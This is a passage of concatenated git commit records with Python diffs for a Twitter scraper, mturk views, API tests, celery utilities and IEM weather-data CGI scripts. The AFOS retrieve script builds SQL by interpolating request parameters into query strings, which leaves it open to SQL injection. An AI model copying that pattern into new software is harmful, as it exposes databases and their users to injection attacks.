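    mocked_app = cfg['nodes']['node']['mocked_app']
    if mocked_app == 'op_worker' or mocked_app == 'globalregistry':
        include_domain = True
appmock_ips.append(common.get_docker_ip(appmock_id))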
7102a79cae2fc60c9747b5ee1285544fc290d3a3
|
Add URL to 404 error message
|
twitterscraper/TwitterScraper.py
|
twitterscraper/TwitterScraper.py
|
from bs4 import BeautifulSoup
import json
import csv
import logging
import urllib
import random
import time
from fake_useragent import UserAgent
ua = UserAgent()
headers_list = [ua.chrome, ua.google, ua['google chrome'], ua.firefox, ua.ff]
class Scraper:
def __init__(self,
topics,
no_tweets=float('inf'),
lang='',
begin_date='',
end_date='',
authors='',
recipients='',
near='',
within=1,
filename=''):
self.topics = self.parse_topics(topics)
self.no_tweets = no_tweets
self.lang = lang
self.begin_date = begin_date
self.end_date = end_date
self.authors = self.parse_authors(authors)
self.recipients = self.parse_recipients(recipients)
self.filename = filename
self.first_tweet_id = 0
self.last_tweet_id = 0
self.collected_tweets = 0
self.location = self.parse_location(near, within)
self.min_position = -1
if self.filename:
self.writer = csv.writer(open(self.filename, 'wb'), delimiter="\t")
def parse_topics(*topics):
if type(topics[1]) is str:
topics_string = topics[1]
elif type(topics[1]) is list:
topics_string = ' '.join(topics[1])
topics_string = topics_string.replace(' ', '%20')
return topics_string
def parse_authors(*authors):
if authors[1]:
if type(authors[1]) is str:
authors_string = authors[1]
elif type(authors[1]) is list:
authors_string = "%20OR%20from%3A".join(authors[1])
return authors_string
def parse_recipients(*recipients):
if recipients[1]:
if type(recipients[1]) is str:
recipients_string = recipients[1]
elif type(recipients[1]) is list:
recipients_string = "%20OR%20to%3A".join(recipients[1])
return recipients_string
def parse_location(self, location, within):
if location:
if type(location) is str:
location_string = 'near%3A"' + location + '"%20within%3A' + within
elif type(location) is list:
location_string = '"geocode%3A' + \
str(location[0]) + '%2C' + \
str(location[1]) + '%2C' + within
return location_string
def is_first_iteration(self):
return True if self.min_position == -1 else False
def continue_scraping(self, tweets):
if (self.collected_tweets < self.no_tweets) and len(tweets) > 0:
return True
else:
return False
def parse_url(self):
url_1 = "https://twitter.com/search?f=tweets&vertical=default&q="
url_2 = "https://twitter.com/i/search/timeline?f=tweets&vertical=default&include_available_features=1&include_entities=1&reset_error_state=false&src=typd"
if self.is_first_iteration():
url = url_1 + self.topics
else:
url = url_2 + \
"&max_position=%s&q=%s" % (self.min_position, self.topics)
if self.lang:
url += "%20lang%3A" + self.lang
if self.begin_date:
url += "%20since%3A" + self.begin_date
if self.end_date:
url += "%20until%3A" + self.end_date
if self.authors:
url += "%20from%3A" + self.authors
if self.recipients:
url += "%20to%3A" + self.recipients
if self.location:
url += '%20' + self.location
return url
def scrape_tweets(self):
url = self.parse_url()
headers = {'User-Agent': random.choice(headers_list)}
req = urllib.request.Request(url, headers=headers)
tweets = []
try:
response = urllib.request.urlopen(req).read().decode()
if self.is_first_iteration():
html = response
else:
response_json = json.loads(response)
html = response_json['items_html']
soup = BeautifulSoup(html, "lxml")
tweets = soup.find_all('li', 'js-stream-item')
if tweets:
self.last_tweet_id = tweets[-1]['data-item-id']
self.first_tweet_id = tweets[0]['data-item-id']
if self.is_first_iteration():
self.min_position = "TWEET-%s-%s" % (self.last_tweet_id,
self.first_tweet_id)
else:
minp_splitted = response_json['min_position'].split('-')
minp_splitted[1] = self.last_tweet_id
self.min_position = "-".join(minp_splitted)
except urllib.request.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
time.sleep(1)
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
time.sleep(1)
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
time.sleep(1)
return tweets
def extract_data_from_tweet(self, tweet):
tweet_user = tweet.find('span', 'username').text
tweet_fullname = tweet.find('strong', 'fullname').text.encode('utf8')
tweet_text = tweet.find('p', 'tweet-text')
if tweet_text:
tweet_text = tweet_text.text.encode('utf8')
tweet_id = tweet['data-item-id']
timestamp = tweet.find('a', 'tweet-timestamp')['title']
return [tweet_user, tweet_id, timestamp, tweet_fullname, tweet_text]
def write(self, post):
if self.filename:
self.writer.writerow(post)
else:
print(post)
def scrape(self):
tweets = [-1]
print("collecting %s number of Tweets on the topics: %s" % (
self.no_tweets, self.topics))
while self.continue_scraping(tweets):
tweets = self.scrape_tweets()
for tweet in tweets:
self.collected_tweets += 1
post = self.extract_data_from_tweet(tweet)
self.write(post)
|
Python
| 0.000001
|
@@ -4915,24 +4915,69 @@
ror
-= ' + str(
+%7B%7D while requesting %22%7B%7D%22'.format(%0A
e.code
+, url
))%0A
|
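Decoded, the hunk rewrites the HTTPError log line to include the requested URL (a reconstruction):

# before
logging.error('HTTPError = ' + str(e.code))
# after
logging.error('HTTPError {} while requesting "{}"'.format(
    e.code, url))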
f7060b65464b24bb16a8cf4704c68fa1348d655c
|
bump version
|
crossbar/crossbar/__init__.py
|
crossbar/crossbar/__init__.py
|
###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
__version__ = "0.9.4-2"
|
Python
| 0
|
@@ -1226,11 +1226,11 @@
%220.9.4-
-2
+3
%22%0A
|
1eb8bfbe2f35393b23d621e2ccc1337f13a27730
|
fix filter first
|
mturk/viewsets.py
|
mturk/viewsets.py
|
from rest_framework.viewsets import GenericViewSet
from rest_framework import mixins
from rest_framework.decorators import detail_route, list_route
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from rest_framework import status
from hashids import Hashids
from django.db import transaction
from mturk.models import MTurkHIT, MTurkAssignment, MTurkNotification
from crowdsourcing.models import TaskWorker, TaskWorkerResult
from crowdsourcing.serializers.task import TaskSerializer, TaskWorkerResultSerializer
from mturk.interface import MTurkProvider
from mturk.permissions import IsValidHITAssignment
from mturk.utils import get_or_create_worker
from csp import settings
class MTurkAssignmentViewSet(mixins.CreateModelMixin, GenericViewSet):
queryset = MTurkAssignment.objects.all()
serializer_class = TaskSerializer
def create(self, request, *args, **kwargs):
worker = get_or_create_worker(worker_id=request.data.get('workerId'))
provider = MTurkProvider('https://' + request.get_host())
task_id = request.data.get('taskId', -1)
task_hash = Hashids(salt=settings.SECRET_KEY, min_length=settings.MTURK_HASH_MIN_LENGTH)
task_id = task_hash.decode(task_id)
if len(task_id) == 0:
task_id = -1
hit_id = request.data.get('hitId', -1)
mturk_hit = get_object_or_404(MTurkHIT, task_id=task_id, hit_id=hit_id)
assignment_id = request.data.get('assignmentId', -1)
mturk_assignment_id = None
if assignment_id != 'ASSIGNMENT_ID_NOT_AVAILABLE':
assignment, is_valid = provider.get_assignment(assignment_id)
if not assignment or (is_valid and assignment.HITId != hit_id):
return Response(data={"message": "Invalid assignment"}, status=status.HTTP_400_BAD_REQUEST)
task_worker, created = TaskWorker.objects.get_or_create(worker=worker, task_id=task_id[0])
if created:
task_worker.task_status=TaskWorker.STATUS_IN_PROGRESS
task_worker.save()
assignment, created = MTurkAssignment.objects.get_or_create(hit=mturk_hit,
assignment_id=assignment_id,
task_worker=task_worker)
mturk_assignment_id = assignment.id
if created:
assignment.status = TaskWorker.STATUS_IN_PROGRESS
assignment.save()
task_serializer = TaskSerializer(instance=mturk_hit.task,
fields=('id', 'template', 'project_data', 'status'))
response_data = {
'task': task_serializer.data,
'assignment': mturk_assignment_id
}
return Response(data=response_data, status=status.HTTP_200_OK)
@detail_route(methods=['post'], permission_classes=[IsValidHITAssignment], url_path='submit-results')
def submit_results(self, request, *args, **kwargs):
mturk_assignment = self.get_object()
template_items = request.data.get('template_items', [])
with transaction.atomic():
task_worker_results = TaskWorkerResult.objects.filter(task_worker_id=mturk_assignment.task_worker.id)
serializer = TaskWorkerResultSerializer(data=template_items, many=True)
if serializer.is_valid():
if task_worker_results.count() != 0:
serializer.update(task_worker_results, serializer.validated_data)
else:
serializer.create(task_worker=mturk_assignment.task_worker)
return Response(data={'message': 'Success'}, status=status.HTTP_200_OK)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
@list_route(methods=['post', 'get'], url_path='notification')
def notification(self, request, *args, **kwargs):
hit_id = request.query_params.get('Event.1.HITId')
assignment_id = request.query_params.get('Event.1.AssignmentId')
event_type = request.query_params.get('Event.1.EventType')
mturk_assignment = MTurkAssignment.objects.filter(hit__hit_id=hit_id, assignment_id=assignment_id)
if event_type in ['AssignmentReturned', 'AssignmentAbandoned']:
mturk_assignment.status = TaskWorker.STATUS_SKIPPED
mturk_assignment.task_worker.task_status = TaskWorker.STATUS_SKIPPED
mturk_assignment.save()
MTurkNotification.objects.create(data=request.query_params)
return Response(data={}, status=status.HTTP_200_OK)
|
Python
| 0
|
@@ -3708,32 +3708,171 @@
nt.task_worker)%0A
+ mturk_assignment.task_worker.task_status = TaskWorker.STATUS_SUBMITTED%0A mturk_assignment.task_worker.save()%0A
@@ -4459,32 +4459,40 @@
d=assignment_id)
+.first()
%0A if even
|
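Decoded, the two hunks (1) mark the task worker as submitted after results are created and (2) resolve the queryset to a single row with .first(), which is the bug named in the subject: the old notification handler set attributes on a QuerySet rather than on an assignment (a reconstruction):

# in submit_results():
else:
    serializer.create(task_worker=mturk_assignment.task_worker)
    mturk_assignment.task_worker.task_status = TaskWorker.STATUS_SUBMITTED
    mturk_assignment.task_worker.save()

# in notification():
mturk_assignment = MTurkAssignment.objects.filter(
    hit__hit_id=hit_id, assignment_id=assignment_id).first()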
d6348555f6abd88d0e2cd4ceb0993f89032659ee
|
move to new format of response:Dict, rather than list of tuples
|
TestAPI.py
|
TestAPI.py
|
import requests
import nose
_HOST_UNDER_TEST = ""
def setup_module():
f = open('test_url.cfg', 'r')
global _HOST_UNDER_TEST
_HOST_UNDER_TEST = f.readline().strip()
f.close()
class TestPremium:
def test_region1_age40(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': 40}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result[1][0] == 'CA_KFHP_005'
nose.tools.assert_almost_equal(result[1][1], 258.58, places=2)
assert len(result) == 5, 'Got %r results' % len(result)
def test_all_params(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': '25', 'limit':'3'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result[0][0] == 'CA_KFHP_015'
nose.tools.assert_almost_equal(result[0][1], 202.17, places=2)
assert len(result) == 3, '%r returned' % result
def test__no_age(self):
payload = {'lat': '39.68', 'long': '-122.48', 'limit':'3'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result['message'] == 'Age is required'
def test_no_limit(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': '25'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert len(result) == 5, '%r returned' % result
class TestState:
def test_Artois_CA(self):
#http://tools.wmflabs.org/geohack/geohack.php?pagename=Artois%2C_California¶ms=39_37_11_N_122_11_38_W_region:US_type:city
payload = {'lat': '39.619722', 'long':'-122.193889'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
assert result['state'] == 'CA'
assert result['county'] == 'GLENN', 'county returned is %r' % result['county']
def test_lat39_long122(self):
payload = {'lat': '39', 'long': '-122'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
assert result['state'] == 'CA'
assert result['county'] == 'COLUSA', 'county returned is %r' % result['county']
def test_TXStateCapitol(self):
payload = {'lat': '30.274635', 'long': '-97.74039'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
# returning CA/Butte for all locations outside of california right now
assert result['state'] == 'CA'
assert result['county'] == 'BUTTE', 'county returned is %r' % result['county']
class TestRegion:
def test_CA_butte(self):
payload = {'state': 'CA', 'county': 'BUTTE'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result == 1, 'region returned is %r' % result
def test_CA_napa(self):
payload = {'state': 'ca', 'county': 'napa'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result == 2, 'region returned is %r' % result
def test_TX_travis(self):
payload = {'state': 'TX', 'county': 'Travis'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result['message'] == "County Travis doesn't have a matching health region", \
'region returned is %r' % result
|
Python
| 0.000011
|
@@ -1,12 +1,126 @@
+# imports for managing json parsing%0Afrom collections import OrderedDict%0Afrom decimal import Decimal%0Aimport json%0A%0A%0A
import reque
@@ -535,32 +535,170 @@
result =
-r.json()
+json.loads(r.content, object_pairs_hook=OrderedDict, parse_float=Decimal)%0A assert result.keys()%5B1%5D == 'CA_KFHP_005', '%25r returned' %25 result
%0A ass
@@ -686,32 +686,33 @@
result%0A
+#
assert result%5B1%5D
@@ -731,16 +731,40 @@
FHP_005'
+, '%25r returned' %25 result
%0A
@@ -756,32 +756,125 @@
result%0A
+nose.tools.assert_almost_equal(result%5Bresult.keys()%5B1%5D%5D, Decimal(258.58), places=2)%0A #
nose.tools.asser
@@ -950,17 +950,17 @@
ult) ==
-5
+8
, 'Got %25
@@ -1198,17 +1198,24 @@
us_code%0A
-%09
+
result =
@@ -1219,63 +1219,279 @@
t =
-r.json()%0A%09assert result%5B0%5D%5B0%5D == 'CA_KFHP_015'%0A
+json.loads(r.content, object_pairs_hook=OrderedDict, parse_float=Decimal)%09%0A assert result.keys()%5B0%5D == 'CA_KFHP_015'%0A #assert result%5B0%5D%5B0%5D == 'CA_KFHP_015'%0A nose.tools.assert_almost_equal(result%5Bresult.keys()%5B0%5D%5D, Decimal(202.17), places=2)%0A #
nose
@@ -2131,17 +2131,17 @@
ult) ==
-5
+8
, '%25r re
|
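Decoded, the hunks switch the premium tests from positional list indexing to an ordered dict keyed by plan id, parsing floats as Decimal, and raise the expected result counts from 5 to 8. The reworked first test reads roughly (a condensed reconstruction; result.keys()[i] indexing implies Python 2, and test_all_params is reworked the same way):

# imports for managing json parsing
from collections import OrderedDict
from decimal import Decimal
import json

result = json.loads(r.content, object_pairs_hook=OrderedDict, parse_float=Decimal)
assert result.keys()[1] == 'CA_KFHP_005', '%r returned' % result
nose.tools.assert_almost_equal(result[result.keys()[1]], Decimal(258.58), places=2)
assert len(result) == 8, 'Got %r results' % len(result)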
2beb62dbd754def3c58f2aa6b3a3431457c88944
|
fix for #9
|
db_demo.py
|
db_demo.py
|
import os
import sys
import cmd
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.orm import sessionmaker
from test import get_sqlite_engine
from kuj_orm import Base, Mtab, MtabIntensity, Exp, etl, mtab_search, mtab_random, match_all_from, match_one
DEBUG=False
def get_session_factory():
if DEBUG:
engine = sqlalchemy.create_engine('sqlite://')
else:
engine = get_sqlite_engine(delete=False)
Base.metadata.create_all(engine)
Session = sessionmaker()
Session.configure(bind=engine)
return Session
# lifting path completion from
# https://stackoverflow.com/questions/16826172/filename-tab-completion-in-cmd-cmd-of-python
def _complete_path(text, line):
arg = line.split()[1:]
dir, base = '', ''
try:
dir, base = os.path.split(arg[-1])
except:
pass
cwd = os.getcwd()
try:
os.chdir(dir)
except:
pass
ret = [f+os.sep if os.path.isdir(f) else f for f in os.listdir('.') if f.startswith(base)]
if base == '' or base == '.':
ret.extend(['./', '../'])
elif base == '..':
ret.append('../')
os.chdir(cwd)
return ret
def mtab_count(session,exp=None):
q = session.query(func.count(Mtab.id))
if exp is not None:
q = q.filter(Mtab.exp.has(name=exp))
return q.first()[0]
def list_exps(session):
for exp_id, count in session.query(Mtab.exp_id, func.count()).\
group_by(Mtab.exp_id):
exp = session.query(Exp).filter(Exp.id==exp_id).first()
print '\t'.join((exp.name,str(count)))
def matches_as_csv(session,pairs):
for m, match in pairs:
out_recs = []
# fixed schema
out_schema = [
'mtab_exp', # source mtab experiment name
'mtab_mz', # source mtab m/z
'mtab_rt', # source mtab retention time
'match_exp', # matched mtab experiment name
'match_mz', # matched mtab m/z
'match_rt', # match mtab retention time
'sample', # sample / datafile containing matched mtab
'intensity' # intensity of matched mtab in that sample
]
# now get metadata for matching metabolite
for mi in session.query(MtabIntensity).\
filter(MtabIntensity.mtab_id==match.id):
# populate fixed schema
out_rec = {
'mtab_exp': m.exp.name,
'mtab_mz': m.mz,
'mtab_rt': m.rt,
'match_exp': match.exp.name,
'match_mz': match.mz,
'match_rt': match.rt,
'sample': mi.sample.name,
'intensity': mi.intensity
}
# now populate variable (per experiment) schema
for attr in mi.sample.attrs:
assert not attr.name in out_rec # fail fast if names collide
out_rec[attr.name] = attr.value
if attr.name not in out_schema: # keep track of all attributes we find
out_schema.append(attr.name)
out_recs.append(out_rec) # save record
# now we have all the output records in hand
# format the output records according to the accumulated union schema
yield ','.join(out_schema)
for rec in out_recs:
out_row = [rec.get(k,'') for k in out_schema]
yield ','.join(map(str,out_row)) # FIXME format numbers better
def console_log(message):
print message
class Shell(cmd.Cmd):
def __init__(self,session_factory):
cmd.Cmd.__init__(self)
self.session_factory = session_factory
self.do_count('')
def do_list(self,args):
session = self.session_factory()
list_exps(session)
session.close()
def do_count(self,args):
session = self.session_factory()
if not args:
n = mtab_count(session)
print '%d metabolites in database' % n
else:
exp = args.split(' ')[0]
n = mtab_count(session, exp)
print '%d metabolites in experiment %s' % (n, exp)
session.close()
def do_add(self,args):
exp, path, mdpath = args.split(' ')
if not os.path.exists(path):
print 'data file %s does not exist' % path
if not os.path.exists(mdpath):
print 'metadata file %s does not exist' % mdpath
else:
print 'loading experiment %s from:' % exp
print 'data file %s' % path
print 'metadata file %s' % mdpath
session = self.session_factory()
etl(session,exp,path,mdpath,log=console_log)
n = session.query(func.count(Mtab.id)).first()[0]
print '%d metabolites in database' % n
session.close()
def complete_add(self, text, line, start_idx, end_idx):
return _complete_path(text, line)
def do_search(self,args):
mz, rt = args.split(' ')
mz = float(mz)
rt = float(rt)
session = self.session_factory()
for m in mtab_search(session,mz,rt):
print m
session.close()
def do_all(self,args):
exp, outf = args.split(' ')
session = self.session_factory()
print 'Searching for matches from %s, please wait ...' % exp
matches = list(match_all_from(session,exp))
if not matches:
print 'No matches found'
else:
print 'Found %d matches' % len(matches)
with open(outf,'w') as fout:
print 'Saving results to %s ...' % outf
for line in matches_as_csv(session,matches):
print >> fout, line
session.close()
def do_remove(self,args):
exp = args.split(' ')[0]
print 'Removing all %s data ...' % exp
session = self.session_factory()
session.query(Mtab).filter(Mtab.exp.has(name=exp)).delete(synchronize_session='fetch')
session.commit()
self.do_list('')
session.close()
def do_test(self,args):
session = self.session_factory()
print 'Randomly matching metabolites...'
while True:
mtab = mtab_random(session)
ms = list(match_one(session,mtab))
if ms:
print '%s matched the following:' % mtab
for m in ms:
print '* %s' % m
break
session.close()
def do_random(self,args):
session = self.session_factory()
print mtab_random(session)
session.close()
def do_exit(self,args):
sys.exit(0)
def do_quit(self,args):
sys.exit(0)
if __name__=='__main__':
shell = Shell(get_session_factory())
shell.cmdloop('Hi Krista')
|
Python
| 0
|
@@ -5926,16 +5926,101 @@
fetch')%0A
+ session.query(Exp).filter(Exp.name==exp).delete(synchronize_session='fetch')%0A
|
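Decoded, the fix for #9 makes do_remove delete the experiment row itself, not just its metabolites (a reconstruction):

session.query(Mtab).filter(Mtab.exp.has(name=exp)).delete(synchronize_session='fetch')
session.query(Exp).filter(Exp.name==exp).delete(synchronize_session='fetch')
session.commit()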
c0e09993facdd76e7b1dfbab97285464f83980bb
|
Update version
|
cast_convert/__init__.py
|
cast_convert/__init__.py
|
#!/usr/bin/env python3
__version__ = '0.1.7.11'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
debug_print(__version__)
command.add_command(version)
|
Python
| 0
|
@@ -39,17 +39,17 @@
'0.1.7.1
-1
+7
'%0A%0A%0Afrom
@@ -238,14 +238,8 @@
-debug_
prin
|
b5cd4ff2b02151bca966c53b80dbea8911a7a6b2
|
Upgrade celery.utils.encoding from kombu
|
celery/utils/encoding.py
|
celery/utils/encoding.py
|
"""
celery.utils.encoding
=====================
Utilties to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)
if sys.version_info >= (3, 0):
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
else:
def str_to_bytes(s): # noqa
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode("utf-8", *args, **kwargs)
if sys.platform.startswith("java"):
def default_encoding():
return "utf-8"
else:
def default_encoding(): # noqa
return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
s = bytes_to_str(s)
if not isinstance(s, basestring):
return safe_repr(s, errors)
return _safe_str(s, errors)
def _safe_str(s, errors="replace"):
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
|
Python
| 0
|
@@ -1,13 +1,12 @@
%22%22%22%0A
-%0A
celery.u
@@ -43,15 +43,15 @@
====
-=
%0A%0AUtil
+i
ties
@@ -421,34 +421,15 @@
%0Aif
-sys.version_info %3E= (3, 0)
+is_py3k
:%0A%0A
@@ -696,24 +696,25 @@
rn s%0A%0Aelse:%0A
+%0A
def str_
@@ -740,32 +740,97 @@
# noqa%0A
+ if isinstance(s, unicode):%0A return s.encode()%0A
return s
@@ -1089,16 +1089,17 @@
%22%0Aelse:%0A
+%0A
def
|
a0ff8cc15df5cd9668e11eba3b5e7406b33dcfc5
|
fix RemovedInDjango19Warning on django.utils.importlib
|
celery_haystack/utils.py
|
celery_haystack/utils.py
|
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueuing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
|
Python
| 0
|
@@ -49,16 +49,85 @@
figured%0A
+try:%0A from importlib import import_module%0Aexcept ImportError:%0A
from dja
|
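Decoded, the fix prefers the stdlib importlib and falls back to the deprecated Django shim, silencing RemovedInDjango19Warning on newer Django while keeping older versions working (a reconstruction):

from django.core.exceptions import ImproperlyConfigured
try:
    from importlib import import_module
except ImportError:
    from django.utils.importlib import import_module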
11cb3297a368b40a6b1002a2394b56ac4fe29f98
|
make sure that the AFOS PIL is uppercase
|
cgi-bin/afos/retrieve.py
|
cgi-bin/afos/retrieve.py
|
#!/usr/bin/env python
import psycopg2
import cgi
import sys
def main():
"""Process the request"""
# Attempt to keep the file from downloading and just displaying in chrome
sys.stdout.write("X-Content-Type-Options: nosniff\n")
sys.stdout.write("Content-type: text/plain\n\n")
form = cgi.FieldStorage()
pil0 = form.getfirst('pil', '')[:6]
limit = int(form.getfirst('limit', 1))
center = form.getfirst('center', '')[:4]
sdate = form.getfirst('sdate', '')[:10]
edate = form.getfirst('edate', '')[:10]
fmt = form.getfirst('fmt', 'text')
if pil0 == '':
sys.stdout.write("ERROR: No pil specified...")
return
centerlimit = '' if center == '' else (" and source = '%s' " % (center, ))
timelimit = ''
if sdate != '' and edate != '':
timelimit = (" and entered >= '%s' and entered < '%s' "
) % (sdate, edate)
pils = pil0.split(",")
myPils = []
for pil in pils:
if len(pil) < 3:
print 'Invalid PIL, try again'
return
if pil[:3] == "WAR":
for q in ['FLS', 'FFS', 'AWW', 'TOR', 'SVR', 'FFW', 'SVS',
'LSR', 'SPS', 'WSW', 'FFA', 'WCN']:
pils.append('%s%s' % (q, pil[3:]))
continue
myPils.append("%6s" % (pil + " ",))
pilAR = "("
for pil in myPils:
pilAR += "'%s'," % (pil,)
pilAR = pilAR[:-1] + ")"
if myPils[0][:3] == 'MTR':
access = psycopg2.connect(database='iem', host='iemdb', user='nobody')
cursor = access.cursor()
sql = """
SELECT raw from current_log c JOIN stations t
on (t.iemid = c.iemid)
WHERE raw != '' and id = '%s' ORDER by valid DESC LIMIT %s
""" % (myPils[0][3:].strip(), limit)
cursor.execute(sql)
for row in cursor:
sys.stdout.write("\001\n")
sys.stdout.write(row[0].replace("\r\r\n", "\n"))
sys.stdout.write("\n\003")
if cursor.rowcount == 0:
sys.stdout.write("ERROR: METAR lookup for %s failed" % (
myPils[0][3:].strip(), ))
return
try:
mydb = psycopg2.connect(database='afos', host='iemdb', user='nobody')
except:
print 'Error Connecting to Database, please try again!'
return
cursor = mydb.cursor()
# Do optimized query first, see if we can get our limit right away
sql = """
SELECT data from products WHERE pil IN """ + pilAR + """
and entered > now() - '2 days'::interval %s %s
ORDER by entered DESC LIMIT %s""" % (centerlimit, timelimit, limit)
cursor.execute(sql)
if cursor.rowcount != limit:
sql = """
SELECT data from products WHERE pil IN """ + pilAR + """ %s %s
ORDER by entered DESC LIMIT %s """ % (centerlimit, timelimit,
limit)
cursor.execute(sql)
for row in cursor:
if fmt == 'html':
sys.stdout.write("<pre>\n")
else:
sys.stdout.write("\001\n")
# Remove control characters from the product as we are including
# them manually here...
sys.stdout.write((row[0]).replace(
"\003", "").replace("\001\r\r\n", "").replace("\r\r\n", "\n"))
if fmt == 'html':
sys.stdout.write("</pre>\n")
else:
sys.stdout.write("\n\003\n")
if cursor.rowcount == 0:
print "Could not Find: "+pil
if __name__ == '__main__':
main()
|
Python
| 0.999999
|
@@ -356,16 +356,24 @@
'')%5B:6%5D
+.upper()
%0A lim
|
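Decoded, the one-line fix uppercases the user-supplied PIL before it is split and padded (a reconstruction):

pil0 = form.getfirst('pil', '')[:6].upper()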
eab44e76010055040242d06ba39218e4c42a6fe1
|
correct failure logic in daily download
|
cgi-bin/request/daily.py
|
cgi-bin/request/daily.py
|
"""Download IEM summary data!"""
from io import StringIO
import datetime
from paste.request import parse_formvars
from pyiem.util import get_dbconn
from pyiem.network import Table as NetworkTable
def get_climate(network, stations):
"""Fetch the climatology for these stations"""
nt = NetworkTable(network)
if not nt.sts:
return "ERROR: Invalid network specified"
data = dict()
clisites = []
cldata = dict()
for station in stations:
if station not in nt.sts:
return ("ERROR: station: %s not found in network: %s") % (
station,
network,
)
cldata[nt.sts[station]["ncdc81"]] = dict()
clisites.append(nt.sts[station]["ncdc81"])
if not clisites:
return data
if len(clisites) == 1:
clisites.append("XX")
mesosite = get_dbconn("coop")
cursor = mesosite.cursor()
cursor.execute(
"""
SELECT station, valid, high, low, precip
from ncdc_climate81 where station in %s
""",
(tuple(clisites),),
)
for row in cursor:
cldata[row[0]][row[1].strftime("%m%d")] = {
"high": row[2],
"low": row[3],
"precip": row[4],
}
sts = datetime.datetime(2000, 1, 1)
ets = datetime.datetime(2001, 1, 1)
for stid in stations:
data[stid] = dict()
now = sts
clsite = nt.sts[stid]["ncdc81"]
while now < ets:
key = now.strftime("%m%d")
data[stid][key] = cldata[clsite].get(
key, dict(high="M", low="M", precip="M")
)
now += datetime.timedelta(days=1)
return data
def get_data(network, sts, ets, stations):
"""Go fetch data please"""
pgconn = get_dbconn("iem")
cursor = pgconn.cursor()
climate = get_climate(network, stations)
if not isinstance(climate, dict):
return ""
sio = StringIO()
sio.write(
"station,day,max_temp_f,min_temp_f,max_dewpoint_f,"
"min_dewpoint_f,precip_in,avg_wind_speed_kts,avg_wind_drct,"
"min_rh,avg_rh,max_rh,climo_high_f,climo_low_f,climo_precip_in,"
"snow_in,snowd_in,min_feel,avg_feel,max_feel,max_wind_speed_kts,"
"max_wind_gust_kts\n"
)
if len(stations) == 1:
stations.append("ZZZZZ")
cursor.execute(
"""SELECT id, day, max_tmpf, min_tmpf, max_dwpf, min_dwpf,
pday, avg_sknt, vector_avg_drct, min_rh, avg_rh, max_rh, snow,
snowd, min_feel, avg_feel, max_feel, max_sknt, max_gust
from summary s JOIN stations t
